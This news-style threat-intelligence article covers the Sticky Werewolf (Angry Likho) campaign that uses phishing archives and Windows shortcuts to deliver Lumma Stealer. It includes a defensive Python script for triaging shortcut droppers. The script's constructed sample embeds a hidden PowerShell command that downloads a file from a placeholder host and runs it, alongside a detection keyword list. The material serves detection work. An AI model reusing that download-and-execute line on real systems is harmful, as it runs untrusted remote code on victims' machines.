Sticky Werewolf’s Latest Attack Campaign: Targeting Russia and Belarus with Lumma Stealer Malware


A threat actor tracked as Sticky Werewolf has been linked to a wave of targeted attacks against organizations in Russia and Belarus. The attacks deliver the Lumma Stealer information-stealing malware by way of a previously undocumented implant. Kaspersky tracks the activity under the name Angry Likho and notes its strong resemblance to Awaken Likho (also tracked as Core Werewolf). This article covers the mechanics of the attack, the group's methods and targets, and the threat the campaign poses to organizations in the region.

The Attack

Sticky Werewolf, which Kaspersky tracks as Angry Likho, has been running targeted campaigns aimed primarily at Russian and Belarusian entities. Kaspersky describes the group's tactics as narrowly focused: a compact infrastructure and purpose-built implants for each attack.

The attackers typically target large organizations, including government agencies and their contractors. Initial access comes through phishing emails carrying archive attachments that deploy the malicious payload. A previously unknown implant then delivers Lumma Stealer, which harvests sensitive data such as banking details, login credentials and cryptocurrency wallet information.

The attackers are likely native Russian speakers, judging by the fluent Russian used in their phishing emails. The campaign is long-running: earlier attacks used a range of other malware, including NetWire, Ozone RAT and DarkTrack. The malware also carries anti-analysis measures, including checks for sandbox environments, so that it does not reveal its behaviour when run under automated analysis tooling.

What Undercode Says: Analysis of the Angry Likho Attack Campaign

Sticky Werewolf's tactics are a reminder of how much effort now goes into targeted intrusions. The Angry Likho activity blends social engineering with technical tradecraft to get past defences. Phishing emails carrying malicious files, such as Windows shortcut (LNK) files packed inside an archive, are a familiar tactic. What sets this campaign apart is the final payload: Lumma Stealer, an information stealer that harvests an extensive range of sensitive data.
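The delivery chain described above, a phishing email whose archive attachment carries a Windows shortcut, can be triaged at the mail gateway or by an analyst before any decoy is opened. The Python script below is an added example and is not code from the original report or from Kaspersky. It builds a constructed sample archive holding a decoy PDF and a shortcut named to look like a PDF, then scans every member for the shell-link header magic regardless of file extension and parses the shortcut's StringData to expose the command line it would launch. The LNK layout follows the public MS-SHLLINK specification; the sample PowerShell command line, the host example.invalid, the latin-1 fallback for non-Unicode strings and the keyword list are assumptions for illustration. ZIP is used because Python's standard library reads it; the same per-member check applies to RAR or other formats with a suitable reader.

```python
"""Triage an attachment archive for Windows shortcut (LNK) droppers."""
import io
import struct
import zipfile

# First 20 bytes of every shell link: HeaderSize (0x4C) followed by LinkCLSID
# 00021401-0000-0000-C000-000000000046 in on-disk byte order (MS-SHLLINK 2.1).
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1) that steer the parser below.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7

# StringData sections appear in this fixed order when their flag is set.
STRING_DATA = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
               (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
               (HAS_ICON, "icon_location"))

# Assumed keyword list: launchers and download primitives common in LNK lures.
SUSPICIOUS_LAUNCH = ("powershell", "cmd.exe", "mshta", "wscript", "cscript",
                     "rundll32", "http://", "https://", "-enc", "-w hidden",
                     "bitsadmin", "certutil")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, arguments, ...) of a shell link."""
    if len(data) < HEADER_SIZE or data[:20] != LNK_MAGIC:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:            # IDListSize (u16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:          # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        # ANSI strings use the creator's code page; latin-1 is an assumption.
        fields[name] = raw.decode("utf-16-le" if unicode else "latin-1", "replace")
    return fields


def triage_archive(blob: bytes) -> list:
    """Flag archive members that are shell links, whatever their extension."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            has_magic = data[:20] == LNK_MAGIC
            ext_lnk = info.filename.lower().endswith(".lnk")
            if not (has_magic or ext_lnk):
                continue
            finding = {"member": info.filename, "lnk_magic": has_magic, "reasons": []}
            if has_magic and not ext_lnk:
                finding["reasons"].append("shell link header under a non-.lnk name")
            if info.filename.count(".") >= 2:          # e.g. report.pdf.lnk
                finding["reasons"].append("double extension")
            if has_magic:
                try:
                    fields = parse_lnk(data)
                except (ValueError, struct.error) as exc:
                    fields = {}
                    finding["reasons"].append(f"malformed shell link: {exc}")
                finding.update(fields)
                launch = " ".join((fields.get("relative_path", ""),
                                   fields.get("arguments", ""))).lower()
                hits = [k for k in SUSPICIOUS_LAUNCH if k in launch]
                if hits:
                    finding["reasons"].append("suspicious launch: " + ", ".join(hits))
            findings.append(finding)
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal shell link: no IDList or LinkInfo, Unicode StringData."""
    header = LNK_MAGIC + struct.pack("<I", HAS_REL_PATH | HAS_ARGS | IS_UNICODE)
    header += bytes(HEADER_SIZE - len(header))        # attributes, times etc. zeroed

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def build_sample_archive() -> bytes:
    """Constructed sample: a decoy PDF beside a shortcut named to look like one."""
    lnk = build_lnk(
        "..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        '-w hidden -c "iwr http://example.invalid/p -OutFile $env:TEMP\\p.exe; & $env:TEMP\\p.exe"',
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Contract_2025.pdf", b"%PDF-1.4\n% constructed decoy\n")
        zf.writestr("Contract_2025.pdf.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_archive(build_sample_archive()):
        print(finding["member"], "->", "; ".join(finding["reasons"]))
```

The check keys on the header magic rather than the file name, because a shortcut renamed to hide its extension still carries the CLSID and still executes when double-clicked. Reading the arguments out of StringData gives the launched command line without ever executing the shortcut, which is the artefact worth keeping in a triage record.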

Lumma Stealer targets browsers and cryptocurrency wallets, taking everything from saved banking details to wallet private keys. Its support for specific applications such as the MetaMask browser extension, the KeePass password manager and the AnyDesk remote-access tool shows a clear understanding of which data is valuable to a buyer: a stolen KeePass database or AnyDesk credentials give an attacker more than a password list, they open a path into the systems and networks that hold financial and corporate data.

The malware also includes evasion techniques, among them checks that detect sandbox and emulator environments, which points to a deliberate effort to frustrate automated analysis. This matters because a sample that stays dormant inside a sandbox yields no behavioural signal, so both signature-based tools and behaviour-based detection can miss it until it runs on a real victim.

From an organizational standpoint, the attack also underscores the risk to government entities and their contractors. These sectors hold sensitive information and operate critical infrastructure, making them prime targets for both espionage and financially motivated attacks.

Moreover, the group's ongoing evolution, from simple phishing to deploying specialised malware, highlights the shifting landscape of cyberattacks. As defensive measures improve, threat actors adapt, employing new and refined techniques to stay a step ahead.

Fact Checker Results:

  • The use of sophisticated evasion techniques, such as emulator and sandbox detection, is verified and consistent with known behaviors from similar cybercriminal groups.
  • The malware’s ability to steal sensitive information, including from cryptocurrency wallets, is supported by multiple cybersecurity reports and observed in previous campaigns.
  • The attribution of the group to Russian speakers is plausible, given the language of the phishing lures and the geographical focus of the attacks.

References:

Reported By: https://thehackernews.com/2025/02/sticky-werewolf-uses-undocumented.html